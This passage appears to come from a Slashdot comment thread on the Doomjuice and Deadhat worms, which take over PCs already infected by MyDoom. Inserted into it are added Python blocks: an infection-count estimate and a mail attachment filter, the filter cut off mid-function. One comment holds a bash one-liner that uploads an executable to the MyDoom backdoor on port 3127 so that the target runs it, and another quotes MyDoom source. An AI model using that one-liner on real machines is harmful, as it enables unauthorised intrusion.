      }
      close(INPUT) || die "Can't close: $!";

      --
      superman runs linux
    9. Re:DoomNet... by tranZent · · Score: 1

      on FreeBSD (and probably Linux)

      #!/bin/bash

      echo -e -n "\x85\x13\x3c\x9e\xa2"|cat - payload.exe|socket -wq 1.2.3.4 3127

    10. Re:DoomNet... by wwest4 · · Score: 1

      Since you seem to be in the know... how common are these variants in the wild? I've had a snort filter listening on the mydoom 'sploit ports the last day and a half and I haven't seen any mydoom/deadhat/vesser scans at all.

    11. Re:DoomNet... by httptech · · Score: 3, Informative

      In the past two days, my honeypot listening on port 3127 has captured 56 copies of Doomjuice.A, 10 copies of Doomjuice.B and 1 copy of Mitglieder. It's really not a lot if you think about how big the Mydoom.A outbreak appeared to be. Here's an extra credit math problem - take those numbers and the time it takes to scan a subnet and get a rough estimate of infected machines. Each Doomjuice-infected system starts 64 threads, each one picks a class C at random and attempts to connect to hosts 1-254 in sequence (the 127.x.x.x class A subnet is the only one skipped)
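An added worked version of the estimate the comment above poses (not part of the original post). The time spent per connection attempt is not given in the thread, so it is a parameter here; the example also assumes every infected host scans for the whole window, picks /24s uniformly at random, and that each sweep of the sensor's /24 yields one captured copy.

```python
import math
import random

CAPTURES = {"Doomjuice.A": 56, "Doomjuice.B": 10}  # counts from the comment
WINDOW_S = 2 * 24 * 3600        # "the past two days"
THREADS = 64                    # scanning threads per infected host
HOSTS_PER_SWEEP = 254           # hosts 1-254 tried in sequence
# 2**24 possible /24 prefixes minus the 2**16 inside 127.0.0.0/8.
TOTAL_SUBNETS = 2**24 - 2**16


def sweeps_per_host(secs_per_connect, window_s=WINDOW_S):
    """Number of /24 sweeps one infected host completes in the window."""
    return THREADS * window_s / (HOSTS_PER_SWEEP * secs_per_connect)


def estimate_population(hits, sweeps, total_subnets=TOTAL_SUBNETS):
    """Solve E[hits] = N * sweeps / total_subnets for N."""
    return hits * total_subnets / sweeps


def poisson_cdf(k, mu):
    """P(X <= k) for X ~ Poisson(mu), summed term by term."""
    term = total = math.exp(-mu)
    for i in range(1, k + 1):
        term *= mu / i
        total += term
    return min(total, 1.0)


def poisson_interval(k, conf=0.95):
    """Exact (Garwood) confidence interval for a Poisson mean, by bisection."""
    alpha = (1 - conf) / 2

    def solve(target, kk):
        lo, hi = 0.0, 2.0 * k + 20.0
        for _ in range(100):
            mid = (lo + hi) / 2
            if poisson_cdf(kk, mid) > target:   # CDF falls as mu grows
                lo = mid
            else:
                hi = mid
        return (lo + hi) / 2

    lower = 0.0 if k == 0 else solve(1 - alpha, k - 1)
    return lower, solve(alpha, k)


def estimate_range(hits, secs_per_connect, conf=0.95):
    """(low, point, high) infected-host estimates for an assumed connect time."""
    lo, hi = poisson_interval(hits, conf)
    sweeps = sweeps_per_host(secs_per_connect)
    return tuple(estimate_population(h, sweeps) for h in (lo, hits, hi))


def simulate_hits(n_infected, sweeps, total_subnets, rng):
    """Toy address space: count sweeps that land on the sensor's subnet (index 0)."""
    return sum(1 for _ in range(n_infected * sweeps)
               if rng.randrange(total_subnets) == 0)


def mean_simulated_estimate(trials=200, n_infected=100, sweeps=20,
                            total_subnets=100, seed=1):
    """Average estimate over many toy runs; should recover n_infected."""
    rng = random.Random(seed)
    runs = [estimate_population(simulate_hits(n_infected, sweeps, total_subnets, rng),
                                sweeps, total_subnets) for _ in range(trials)]
    return sum(runs) / trials


if __name__ == "__main__":
    hits = sum(CAPTURES.values())
    for secs in (1.0, 5.0, 21.0):   # assumed seconds per connection attempt
        low, point, high = estimate_range(hits, secs)
        print(f"{secs:>4}s/connect: {point:,.0f} hosts (95% CI {low:,.0f} to {high:,.0f})")
    print("toy simulation, true N=100:", round(mean_simulated_estimate(), 1))
```

The estimate scales linearly with the assumed connect time, so that one unknown dominates the uncertainty far more than the Poisson interval on 66 captures.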

  14. Is "DeadHat" a reference to .... by Kehl · · Score: 4, Funny

    ... the now defunct "RedHat" Linux distro?

    Way to go on damning Linux users' reputation :/

  15. Virus names by Anonymous Coward · · Score: 5, Funny

    Do you think people come up with a clever virus name or the virus first?

    1. Re:Virus names by DougWhite · · Score: 5, Funny

      Isn't it kinda like forming a Rock Band, you pick the name, and the image. The music comes to you after you sell your soul to the RIAA?

    2. Re:Virus names by Erick+the+Red · · Score: 4, Interesting

      The anti-virus companies come up with the names, often making fun of the virus writers in the process. MyDoom was named for a variable misspelling: MyDoomain (supposed to be MyDomain).

      --

      DO NOT WRITE IN THIS SPACE

      ok
    3. Re:Virus names by eidechse · · Score: 2, Informative

      The names are determined by virus researchers, not the virus writers. In fact, if during analysis it's apparent that the writer wanted a certain name used that name is intentionally avoided.

    4. Re:Virus names by DR+SoB · · Score: 1

      Before virus companies took over, people would normally come up with a name first, because their virus had an intended target. For example the virus "Silence of the Lambs" was apparently targeted at a certain high school VP named Mrs. Lamb. Of course that was just a rumour :P

      --
      Mod +5 Drunk
    5. Re:Virus names by T-Ranger · · Score: 1
      It's more like $RECORD_LABEL chooses an image, genre, 'catch', and name. And then chooses from available bodies to fill the slots of band members.

      Spice Girls is a good example of this... almost. The girls all responded to the same ad looking for singers, and they met in the lobby/waiting room of $EVIL_RECORD_LABEL. Then they collectively took the idea and went somewhere else.

      Other completely 'invented' bands (some self-invented from already famous musicians): Asia, The Byrds, The Monkees, BTO... and basically any boy band there ever was.

    6. Re:Virus names by Anonymous Coward · · Score: 0

      The anti-virus companies come up with the names, often making fun of the virus writers in the process. MyDoom was named for a variable misspelling: MyDoomain (supposed to be MyDomain).

      How do you know this? The only references to "+mydoom +mydoomain" on Google are one-liners on a couple of small Spanish and German sites.

      Running 'strings' on the binary does not reveal the word "mydoomain" anywhere, and the virus companies did not have access to the source back when they named it.

      So I'm curious: if what you claim is true, where is the evidence?

    7. Re:Virus names by Erick+the+Red · · Score: 1

      My post:
      The anti-virus companies come up with the names, often making fun of the virus writers in the process. MyDoom was named for a variable misspelling: MyDoomain (supposed to be MyDomain).

      The second sentence was just a repeat of what I had heard earlier on Slashdot. After a bit of looking around, I found that, as you pointed out, it has no factual basis. In fact, I found this quote:

      Mydoom was named by Craig Schmugar, an employee of computer security firm McAfee and one of the earliest discoverers of the worm. Schmugar chose the name after noticing the text "mydom" within a line of the program's code. He noted: "It was evident early on that this would be very big. I thought having 'doom' in the name would be appropriate."

      So while myDoom was named after a string in the virus, it was named after a different one than I posted, and for a different reason.

      The point of my post was to say that anti-virus companies name the viruses, and avoid names that would give prestige to the virus writer.

      Sorry for the mis-information.

      --

      DO NOT WRITE IN THIS SPACE

      ok
  16. Either that, or... by dnahelix · · Score: 1

    this proofs [sic] MyDoom was initialy spread by organised crime

    Either that, or a bunch of smart, bored kids in the Netherlands...

    --
    Slashdot Eds Link Anonymous Posts With Logged Posts
    They Are Vermin Feeding On Each Other's Feces.
    I Hate \.
    1. Re:Either that, or... by Anonymous Coward · · Score: 0

      don't you mean a bunch of smart board kids?

  17. Re:Organized crime? by Trigun · · Score: 5, Funny

    When are the nation states going to wake up and start an international war against spam?

    When the spammers have oil.

  18. Cyber war? Puleeeze by saskboy · · Score: 5, Insightful

    "In the Netherlands there is a newspaper reporting this proves MyDoom was initialy spread by organised crime in a dark plot to wage cyber-war..."

    If organized crime was looking to steal data, all they had to do is ask people. Hundreds of people hand over their eBay, PayPal, and credit card information every day to phisher emails claiming to be from a legit company. Making a worm to steal the information isn't even necessary when the user is already the weakest link after being socially engineered.

    --
    Saskboy's blog is good. 9 out of 10 dentists agree.
  19. Posing "threads" by AndroidCat · · Score: 3, Insightful
    Viruses that install backdoors aren't new. And scanning to look for the backdoors isn't new. MyDoom.A got big press, spread far, and now (especially since it's now open source :) there are going to be a lot of people taking advantage of it.

    All the speculation about who did it or even why is still speculation. (If someone hated SCO so much, why stop after two weeks?)

    --
    One line blog. I hear that they're called Twitters now.
    1. Re:Posing "threads" by LostCluster · · Score: 1

      Not to mention, DoomJuice appears to have come from the original author, which saves the copycats a lot of time in figuring out how to exploit the new flaw.

      In fact, it seems all these people need to do is change the payload of DoomJuice to fit their specific wishes. One letter is not going to be enough to keep all the DoomJuice.* variants straight.

    2. Re:Posing "threads" by noisehole · · Score: 1

      whoever it was, /. readers don't seem loyal to her/him anymore... bastard

      sync-src-1.00.tbz/sync-1.00/massmail.c

      static const char *loyal_list[] = {
          "berkeley", "unix", "math", "bsd", "mit.e", "gnu", "fsf.",
          "ibm.com", "google", "kernel", "linux", "fido", "usenet",
          "iana", "ietf", "rfc-ed", "sendmail", "arin.", "ripe.",
          "isi.e", "isc.o", "secur", "acketst", "pgp",
          "tanford.e", "utgers.ed", "mozilla", /* "sourceforge", "slashdot", */

          NULL,
          "\n\nbe_loyal:" /* for final .exe */
      };

  20. War? by bad+enema · · Score: 1

    "this proves MyDoom was initialy spread by organised crime in a dark plot to wage cyber-war and steal confidential data from our computers."

    What do they want to wage war against me for?
    I just want to read email!

    1. Re:War? by Anonymous Coward · · Score: 1, Insightful

      What do they want to wage war against me for?
      I just want to read email!


      Because they hate freedom.

  21. "only about 50,000 or 75,000 machines left" by __past__ · · Score: 2, Funny

    Could please someone find their owners and make sure they never get to operate a computer connected to a public network again? They have clearly shown not to be qualified, and are a threat to others.

    1. Re:"only about 50,000 or 75,000 machines left" by Anonymous Coward · · Score: 0

      Could please someone find their owners and make sure they never get to operate a computer connected to a public network again?

      I'll get started on that after lunch.

  22. Funny you should mention that... by OgdEnigmaX · · Score: 1

    Yes. It, like MyDoom, seems to install backdoors and such.

  23. Re:Worms are legal in America, no? by Anonymous Coward · · Score: 1, Insightful

    That's only legal because you have to click on an "I agree to these terms" box to play the game. The fact that you're also running a worm/adware is disclosed in the legal text, but waaaaay down where nobody ever looks. Legal? Yes. Ethical? Only to SCO.

    The problem is that they idiot-proofed the net and then we were surprised when the idiots came.

  24. Grammer check anybody? by Spokehedz · · Score: 0, Redundant

    Sheesh... Proofs? Thread? Now I know the 'editors' don't really edit bupkis.

    Oh, and just so I don't get a OT mod...

    These types of viruses will never die/go away. we'll keep seeing virus after virus come out, and each one will be "the fastest spreading to date" until everyone runs Linux... And then it'll get worse. I mean, running windows updates every day is one thing, but compiling my own kernel after applying the daily patch just gets boring after a bit... I mean, even if I could write a script to automate the process, and do it at 2am every day...

    And then they'd patch the patches, and hack the hacks, and bla bla bla. I have ignored just about every single 'new virus' alert out there because it's just stupid. I don't get any of the viruses, because by the time you hear about them you've already gotten about 50-million in your box, and you're ignoring them already. That, or your virus scanner that updates every day already has the update against it, so it's pointless.

    Oh, and I run OS2/Warp as well. so I guess I'm safe, eh?

  25. I thought that Doomjuice was from the ... by burgburgburg · · Score: 4, Interesting

    creator of the original MyDoom and was leaving a copy of the source of MyDoom on the hard disk. The thoughts were that: a) only the creator of the original would have the source to include as part of Doomjuice's payload and b) if "everyone" had a copy of the source on their hard disk, it would be difficult to prove that any one person was responsible for originally writing it (assuming their computer was found/confiscated/examined).

    1. Re:I thought that Doomjuice was from the ... by LostCluster · · Score: 4, Interesting

      The problem was, by releasing Doomjuice, that author has effectively released an open source program to exploit what I'm calling "DoomNet", the network formed by the PCs infected with MyDoom that haven't been cleaned up yet.

      So, effectively we've got worm-writing for dummies now. No need to write new full-featured virus, nor even the need to know how to exploit an obscure security hole. Just take DoomJuice and add your own payload...

    2. Re:I thought that Doomjuice was from the ... by Dr+Caleb · · Score: 1
      So the legal strategy "It wasn't me, it was a hacker/trojan/virus" when it comes to computer crime, really is a valid and beyond-a-reasonable doubt defense.

      Cool. Hey look! Someone just put all this tentacle rape stuff in my /home directory!

      --
      "History doesn't repeat itself, but it does rhyme." Mark Twain
    3. Re:I thought that Doomjuice was from the ... by LostCluster · · Score: 2, Insightful

      When there's 48 similar worms all doing similar things, it's a little hard to figure out which one came first, and which worm caused which damage. Confuse juries enough to create a reasonable doubt, and in the USA at least you're in the clear...

    4. Re:I thought that Doomjuice was from the ... by TKinias · · Score: 1

      scripsit Dr Caleb:

      Cool. Hey look! Someone just put all this tentacle rape stuff in my /home directory!

      Um, dude, if you've got a /home directory, you don't have a MyDoom problem...

      (And if you're proficient enough to be running Cygwin you probably don't click executable attachments.)

      --
      In principio creauit Linus Linucem.
  26. I wonder by bigattichouse · · Score: 5, Interesting

    Not that I would condone the activity, but I'm surprised someone hasn't made an email virus that installs an OS on the machine. I would find this an incredible violation of one's choice, but I still won't be surprised when it happens.

    --
    meh
    1. Re:I wonder by LostCluster · · Score: 1

      I'm surprised someone hasn't made an email virus that installs an OS on the machine.

      Too many problems with that... Boot sectors are more or less locked down by your standard anti-virus program. Unless the virus installs an already-infected copy of the new operating system, it wouldn't be able to use past infections as zombies.

    2. Re:I wonder by __past__ · · Score: 1

      There was this BeOS installer that was started from Windows, without having to reboot from a CD. Just take that or something similar (ISTR some old Linux distro that did the same) and mail it around, obviously people will simply execute anything they find in their inbox.

    3. Re:I wonder by Chris+Pimlott · · Score: 1

      There'd be little point to this, since even the most oblivious users would tell a difference when they don't see the Windows logo when they boot and they can't find Word.

      Now, a more plausible thing would be to install Cygwin. The user won't see any difference but suddenly their computer has become a lot more useful of a platform from which to launch attacks.

    4. Re:I wonder by The+Limp+Devil · · Score: 1

      Great idea! Someone should make one that installs SCO UNIX so we could blame them for this too!

    5. Re:I wonder by iamdrscience · · Score: 2, Insightful

      50MB email attachments don't work so well.

    6. Re:I wonder by Eberlin · · Score: 2, Interesting

      Unless you're looking at a really small OS, it's a payload/bandwidth issue. As fun as it would have been to network-install SuSe on people, it has got to be darn slow on a dial-up line. Besides, all that downloading slows down the "virus" propagation.

      Now imagine a worm that would go through an IIS-based system, backup all their ASP files and fish for anything SQL Server-related onto a remote server, install LAMP, run ASP2PHP on those ASP files, "restore" them to the server, and electronically file for a MS refund. Sounds good, but of course people would consider this an invasion of their machines. :) Actually sounds like an extended/revised form of the depenguinizer.

    7. Re:I wonder by Tibor+the+Hun · · Score: 1

      haha, THAT would be funny.

      screensavers last night showed menuet os, (www.menuetos.org) written in assembly and it fits on a floppy disk. an os as small as that might be able to be carried as payload.

      --
      If you don't know what AltaVista is (was), get off my lawn.
    8. Re:I wonder by Tony-A · · Score: 1

      Now, a more plausible thing would be to install Cygwin. The user won't see any difference but suddenly their computer has become a lot more useful of a platform from which to launch attacks.

      Which makes me wonder why so few Linux/*BSD attacks and why they all seem to fizzle out. Not to knock Cygwin, but surely the real thing would be better.

    9. Re:I wonder by Anonymous Coward · · Score: 0

      but a network install from, oh say, kernel.org and a little bit of environment knowledge can get the job done. fake an array of referrers and user-agents and you should be a-ok. I wouldn't want to deal with the whole boot sector jazz, though.

  27. A "Dark Plot?" by Tiro · · Score: 1
    I believe it. Note how they used the SCO DDoS in order to deflect attention from what other things the worm does.

    Tiro's Law: Any good thing, like the internet, will be used for exploitation

  28. Old News by Via_Patrino · · Score: 1

    Old news RTF./
    How hard is it to click on the icon on the side of the article before posting a new article?

    1. Re:Old News by LostCluster · · Score: 1

      This is starting to seem like a cyber version of 9/11/01. So many new worms are being reported so quickly that it's starting to become hard to keep the different stories straight. It seems to magnify the effect of fear to have multiple events on top of each other rather than one at a time...

  29. Lamest... Names... Ever by addie · · Score: 3, Funny

    Maybe these guys should just start hard rock bands: MyDoom, DoomJuice, DeadHat... It's like when I worked at LaserQuest and had to listen to all the stupid ideas kids had for their codenames.

    What's next, ThunderCat? MrDoom? Anyone smart enough to write a virus this effective must be more imaginative than this!

    1. Re:Lamest... Names... Ever by SirTalon42 · · Score: 2, Insightful

      Blame the AV companies, they're the ones that have no imagination (and come up w/ the names).

  30. not exactly "novel" by DaCool42 · · Score: 1

    I wouldn't really say this is a novel idea. It seems kind of obvious to me. Worm leaves a gaping hole...write something to exploit gaping hole. duh.

    --

    ----
    All of whose base are belong to the what-now?
    1. Re:not exactly "novel" by LostCluster · · Score: 1

      What's new is that it appears the creator of the gaping hole put out a sequel worm that exploits the hole. No need to understand virus propagation techniques anymore, those who want to exploit the hole for their own use just need to reprogram the payload part of DoomJuice...

    2. Re:not exactly "novel" by mph · · Score: 2, Funny
      I wouldn't really say this is a novel idea. It seems kind of obvious to me. Worm leaves a gaping hole...write something to exploit gaping hole. duh.
      You idiot! By writing a post like that in public, you've just disqualified yourself from ever working in the US Patent Office!
    3. Re:not exactly "novel" by PatrickThomson · · Score: 1

      It seems kind of obvious to me. Worm leaves a gaping hole...write something to exploit gaping hole.

      It's a timeless concept, the giver and the receiver.

      --
      I am one of many. My idea is not unique, nor do I expect my voice alone to sway you. I speak in a chorus of opinion.
    4. Re:not exactly "novel" by Anonymous Coward · · Score: 0

      DoomGoatse?

  31. white hat worms? by Anonymous Coward · · Score: 5, Interesting

    I wonder... what are the legalities behind having a worm go around, attack the backdoor created by MyDoom, and cause an alert box containing the infection info to pop-up on the user console? Or, change the person's wallpaper to a similar message so that they dont just blindly hit ok?

    1. Re:white hat worms? by Anonymous Coward · · Score: 3, Interesting

      Unauthorized access is unauthorized access. The authorities would be happy to prosecute a well-meaning good samaritan. Vigilante justice is (unfortunately) illegal in all circumstances.

      And most people in the know would agree that Welchia, which was the worm intended to fix Blaster infections, was actually worse than Blaster in terms of its impact on networks.

  32. Organized Crime? by knarfling · · Score: 3, Funny
    In the Netherlands there is a newspaper reporting this proves MyDoom was initialy spread by organised crime

    I am willing to admit that SCO is a crime, but who is claiming that they are organized??

    I think I would be willing to admit that it was spread by a criminal company.

    --
    Great civilizations have lived and died on false theories. Don't mess up mine with a few facts.
  33. Idibus Martiis by cwernli · · Score: 1

    Will anybody read this on March 11th, i.e. 28 days later ?

  34. Re:Cyber war? Puleeeze by LostCluster · · Score: 1

    What you described is just a standard-grade cyber scam.

    If organized crime is behind MyDoom, then it certainly allows them to upgrade to a cyber war. MyDoom takes a territory of the Internet over, otherwise innocent users' PCs suddenly do the work of the hackers. No longer would this crime group need to rent out or hack individual servers to run cyber-scams, MyDoom's backdoor gives them full invisible control of the hacked PCs, including the ability to harvest random users' identities and contacts.

  35. Novel? by glenebob · · Score: 1

    >> it still is a novel way to spread a virus

    I think the word I would have used here is 'obvious'...

  36. Taco can't spell by Anonymous Coward · · Score: 0

    "ZDNet Australia is reporting that two new worms, Doomjuice and Deadhat, are taking over computers previously infected by the MyDoom virus. Apparantly [sic, should be "apparently"] they try to uninstall the MyDoom virus and then take over the PC to start their own malignant work. Whilst the thread [sic, should be "threat"] these two worms pose shouldn't be to [sic, should be "too"] big, both needing a MyDoom backdoor, it still is a novel way to spread a virus.In [sic, should be "virus. In"] the Netherlands there is a newspaper reporting [that] this proves MyDoom was initialy [sic, should be "initially"] spread by organised crime in a dark plot to wage cyber-war and steal confidential data from our computers."

  37. Laugh with me... by crimson30 · · Score: 3, Interesting

    1. Go here: doshelp.com
    2. Block applicable ports
    3. Smile when alerts are issued

    1. Re:Laugh with me... by ron_ivi · · Score: 2, Insightful
      Are you suggesting people block all those ports because there are known windows trojans that use them?!?

      Sure if you block ports 21, 25, 53, etc you might be safer, but far less functional a system as well. If you go that far, I think you'd be better firewalling off all ports and just opening the ones for the services you _want_ to have exposed.

    2. Re:Laugh with me... by SirTalon42 · · Score: 1

      Nicely said! If you're blocking ports (if you even have the slightest clue what ports even are really), I bet you already are prepared for a majority of virii.

  38. This just proofs there is an imminent thread... by ErnstKompressor · · Score: 0, Offtopic

    of WMDs in Iraq...

    I think the solution would be a really big spool...

    --
    We apologise for the fault in this post. Those responsible have been sacked. -- Signed RICHARD M. NIXON
  39. A way to deal with worm outbreaks? by gokubi · · Score: 5, Interesting

    "Apparently they try to uninstall the MyDoom virus and then take over the PC to start their own malignant work."

    When a big worm comes out, wouldn't it be possible to write another worm that would utilize the backdoor, get rid of the worm, and then hang about to make reinfection impossible?

    My organization took care of the worm in the first few minutes after it started spreading, but there seem to be a lot of people still out there who aren't protected (if the number of inbound mails my mail server quarantines each day is any indication).

    If someone in a white hat wrote a MyDoom immobilizer worm, and then released it, wouldn't that put a speedy end to MyDoom in the wild?

    --
    I'm much funnier now that I'm a subscriber.
    1. Re:A way to deal with worm outbreaks? by delirium28 · · Score: 5, Insightful
      This happened with one of the other worms last year (Slammer or something similar, I can't recall right now).

      The problem is that by creating a worm that cleans up the original malware worm, the fix is just as bad as the original virus. You're still using a lot of bandwidth that isn't yours, you're still sending out a program to change someone else's system without their permission, etc.

      On the surface it looks like a good idea, but unfortunately it has a lot of serious drawbacks.

      --
      Who is John Galt?
    2. Re:A way to deal with worm outbreaks? by tgd · · Score: 1

      And then they'd go to jail.

      I may not lock my windows, but you better believe you're going to get arrested if you walk into my house and try to lock them for me.

    3. Re:A way to deal with worm outbreaks? by Anonymous Coward · · Score: 0

      Two problems.
      If the whitehat compromised machine starts spamming every machine it sees with backdoor checks, then that solution would be bad for traffic. If that whitehat'd machine only reacts to another machine when it receives a live payload, then that's a little different.

      But then you have the problem of getting rid of the whitehat implementation. Your whitehat 'solution' would need to be waiting in the background in order to do its thing. And when there are many different exploits to 'solve', then there will be many different processes hanging out in the background.

    4. Re:A way to deal with worm outbreaks? by el-spectre · · Score: 1

      Yeah... remember Welchia/Nachi about 6 months ago? That's pretty much what it did, and it cost billions.

      --
      "Faith: Belief without evidence in what is told by one who speaks without knowledge, of things without parallel." - A.B.
    5. Re:A way to deal with worm outbreaks? by Kaki+Nix+Sain · · Score: 1
      I think I would rather see a worm that flashes the screen in some scary way and says, "Hi, you just got a worm...", then goes on to explain how they shouldn't be opening everything that they are sent, maybe refers them to some educational internet sites, and ends with a nice threat about the sort of evil things that the worm could be doing other than just ripping off the user's address book for further propagation.

      --

      (C) Kaki Sain, 2011. By reading this, you have illegally copied my property to your brain.

  40. Hey man, lay off by Anonymous Coward · · Score: 3, Funny

    My Windows box is much better than some stupid ol' Mac. My system installs software ALL ON ITS OWN! Heh, yeah. This software makes my system do things I couldn't have done even if I tried...like sending mail to a bunch of people I haven't even met.

    My system is part of a new global network. Your Mac just sits there and runs. :-P

  41. dark underworld crime lords by perz0n · · Score: 0, Flamebait

    Well isn't it obvious the real crime lord here is Mr Bill Gates. Wasn't it his product that started the original backdoor allowing MyDoom to become part of a more malicious super virus?

  42. for the non-dutch by sosume · · Score: 5, Informative

    or those who cannot get past the registration links:

    Amsterdam - There are signs that the computer virus MyDoom has been brought into circulation by organised crime syndicates. The wormvirus was accompanied yesterday by the evil program 'DeadHat'. Microsoft and software maker SCO have a quarter *billion* dollar in stock to reward the tip that will lead them to its creators.

    According to the British research firm mi2g, deadhat is designed to provide its creator with sustaining, long-term control over a system. This power could be abused to hostage websites.

    It is also possible to abuse the pc in sending spam e-mail, and the program is capable of harvesting passwords and other confidential information. Deadhat is an intelligent software agent, a program .....

    [snip] the really boring part

    According to mi2g, deadhat has encrypted intelligence, waiting to be activated. "This definitely looks like the work of organized crime"

    Meanwhile, Doomjuice has come to surface. Another worm which seems to battle for control of the PC.

    1. Re:for the non-dutch by hotair · · Score: 3, Interesting

      These follow on worms seem like crude attempts to implement Curious Yellow.

      http://blanu.net/curious_yellow.html

      I'm really surprised that we haven't seen various implementations taking over large numbers of computers.

      My only thought has been that the kind of person who implements Curious Yellow is sufficiently more skilled than the average worm writer that they choose to be subtle and slow. If that is the case, then I expect that the 75,000 is a very small number of machines compared to those that are already running a variant of Curious Yellow.

      Just some rambling thoughts.

    2. Re:for the non-dutch by sosume · · Score: 1

      My only thought has been that the kind of person who implements Curious Yellow is sufficiently more skilled than the average worm writer that they choose to be subtle and slow

      Unlikely: the virus will be detected within days so the infection speed must be high to gain momentum.

    3. Re:for the non-dutch by jumbo008 · · Score: 1

      This would not possibly be the same mi2g as in according to mi2g 'MyDoom is now estimated to have caused $38.5 billion of economic damage worldwide so far' now would it?
      That would be 40% of the 9/11 damages to copy a comparison also made in Dutch media.

    4. Re:for the non-dutch by Eric+S.+Smith · · Score: 1
      Unlikely: the virus will be detected within days so the infection speed must be high to gain momentum.

      If the infection speed is low, it may also take longer for the worm to be detected. Furthermore, anti-virus vendors are less likely to assign a high threat rating to a slow infector, which could cause them and their clients to react more slowly.

      If you want your worm to be long-lived rather than famous, a low infection rate might be advantageous.

  43. For Newbies, not experienced users. by Azureflare · · Score: 4, Insightful
    Talk about overreacting. But, you proved the grandparent poster's point. You are obviously not a user who needs to switch to a mac. You know what you are doing.

    These people STILL infected with MyDoom don't know the first thing about computer security. They would be MUCH MUCH better off with a Mac than with windows. All they probably do anyway is chat with their little friends on AIM and check their webmail.

    It's obvious that windows is NOT the perfect OS for clueless newbie users, because it leaves gaping holes for them to be abused through. Think about it from the newbie point of view, not the experienced user point of view.

    Thank you.

    1. Re:For Newbies, not experienced users. by Azureflare · · Score: 1
      Sorry, I was overreacting a bit as well in my post. I'd just like to clarify windows does NOT have "gaping holes" for users to be abused through...As long as they keep up with updates. What I meant was that it is easier for people to be abused on Windows machines than on other alternative platforms.

      Then again, the cost of changing systems may not be warranted in this case. The user would probably be far better off taking a class or two in basic computer security, or some such. I'm not even aware if those kind of classes are even offered though.

    2. Re:For Newbies, not experienced users. by Kenja · · Score: 1

      So explain how using a Mac will stop people from downloading a file from Kazaa or what not and double clicking on it. If enough dumb users are using a Mac someone will just release MyDoom.Mac as an app called OfficeXp-Macintosh-Crack.app

      --

      "Have you ever thought about just turning off the TV, sitting down with your kids, and hitting them?"
    3. Re:For Newbies, not experienced users. by ball-lightning · · Score: 5, Insightful

      These people STILL infected with MyDoom don't know the first thing about computer security. They would be MUCH MUCH better off with a Mac than with windows. All they probably do anyway is chat with their little friends on AIM and check their webmail.


      And that's great, until Macintosh's become popular enough for viruses to be written for them (at which point it's going to be a massacre). A guy I work with owns a Macintosh, and he brags about how he doesn't need to run any antivirus program and how he can open all attachments. If a virus like MyDoom was created for the Macintosh, how much you want to bet my coworker (and people like him) would get infected right away, because they aren't using common sense? Windows may be buggy, and windows may have a lot of security holes, but in this case, MyDoom does not take advantage of any of them. MyDoom takes advantage of the traditional weakest link in any security system, people.

    4. Re:For Newbies, not experienced users. by Azureflare · · Score: 1
      Right, I overreacted a bit in my post... (I did a supplementary post afterwards... Man sometimes I wish I could edit posts on slashdot!)

      Widespread use of an operating system does cause a problem for protection from worms, but I think the adoption of Macs is going to be limited by the fact Macs are so expensive (well not the old iMacs). At any rate, I think the BEST solution isn't getting a new type of machine or operating system, it's getting those users to educate themselves about the risks they face on the web.

      If only there was a way to get people to learn... I don't know though, I've given up on people. They just don't seem to want to learn new things about computers! I think people still perceive computers as somewhat magical and/or mystical.

    5. Re:For Newbies, not experienced users. by Anonymous Coward · · Score: 0

      And that's great, until Macintosh's become popular enough for viruses to be written for them (at which point it's going to be a massacre).

      Very few people are currently buying computers in the future (e.g. when "Macintosh's become popular enough"). Most of them buy computers now, in the present. _For now_, no matter how little you know about computer security, you'd be safer on a Mac. I'm pretty sure that's all the grandparent post meant.

    6. Re:For Newbies, not experienced users. by Anonymous Coward · · Score: 0

      windows does NOT have "gaping holes" for users to be abused through...As long as they keep up with updates.

      Should be modded up as funny.

      MS takes WEEKS or MONTHS to produce patches. During that time, everyone still has the "gaping holes".

    7. Re:For Newbies, not experienced users. by aztracker1 · · Score: 2, Interesting

      I pretty much agree, at this point, I stop all executables, and .zip files at my mail server.. kind of a pain, but between that, and the 25 RBLs I have setup, I only get about 10-15 unwanted emails a day... *sigh* ... I won't run windows in front of a firewall now, even if pseudo-secure (only known ports available) .. too much of a pain.

      Personally, I like IIS as a webserver, and happen to like .Net.. and as mono matures, am more, and more considering the switch... I haven't liked MS's political stances for several years now, and linux is finally "getting there" enough for a serious look... I can run my favorite text editor under wine, and use firefox (formerly firebird) as my primary browser, and thunderbird for email.. only my work keeps me tied to windows.

      Seriously think in about a year or so, will be able to switch with little drawback, and may even just run windows via vmware under linux... the last try at it with suse and ximian desktop a few months ago wasn't so bad.. a few kinks.. but worked... may make another go, in a few more months. (Already use windows versions of a lot of OSS software as it is now anyhow).

      --
      Michael J. Ryan - tracker1.info
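The attachment policy described in the comment above (reject executables and .zip files at the mail server), sketched as an added example that is not part of the thread or any commenter's setup. The extension list, function names and the sample message are assumptions constructed for illustration; with `block_all_zip=False` it goes one step further than the comment and looks inside archives instead of rejecting them all.

```python
import io
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage

# Assumed gateway policy for this example (not taken from the thread):
# extensions that Windows will execute on a double-click.
BLOCKED_EXT = {".exe", ".scr", ".pif", ".bat", ".cmd", ".com"}


def final_ext(name):
    """Lower-cased last extension, ignoring trailing dots and spaces."""
    name = name.strip().rstrip(". ").lower()
    dot = name.rfind(".")
    return name[dot:] if dot != -1 else ""


def zip_findings(payload):
    """Return a rejection reason for a zip payload, or None if nothing matched."""
    try:
        with zipfile.ZipFile(io.BytesIO(payload)) as archive:
            for member in archive.namelist():
                # Only the last extension counts, so "x.htm   .scr" is caught.
                if final_ext(member) in BLOCKED_EXT:
                    return "zip contains executable: " + member
    except zipfile.BadZipFile:
        # Fail closed: an archive the filter cannot read is not delivered.
        return "unreadable zip"
    return None


def blocked_attachments(raw_message, block_all_zip=True):
    """Return [(filename, reason), ...] for every part the policy rejects."""
    msg = message_from_bytes(raw_message, policy=policy.default)
    hits = []
    for part in msg.walk():
        name = part.get_filename()
        if part.is_multipart() or not name:
            continue
        ext = final_ext(name)
        if ext in BLOCKED_EXT:
            hits.append((name, "executable extension"))
        elif ext == ".zip":
            if block_all_zip:
                hits.append((name, "zip archive"))
            else:
                reason = zip_findings(part.get_payload(decode=True) or b"")
                if reason:
                    hits.append((name, reason))
    return hits


def build_sample():
    """Constructed test message with inert attachments (no real malware)."""
    inert = b"constructed placeholder bytes, not a program"
    archive = io.BytesIO()
    with zipfile.ZipFile(archive, "w") as zf:
        zf.writestr("notes.htm      .scr", inert)
    msg = EmailMessage()
    msg["From"] = "sender@example.com"
    msg["To"] = "user@example.com"
    msg["Subject"] = "constructed test message"
    msg.set_content("See attached.")
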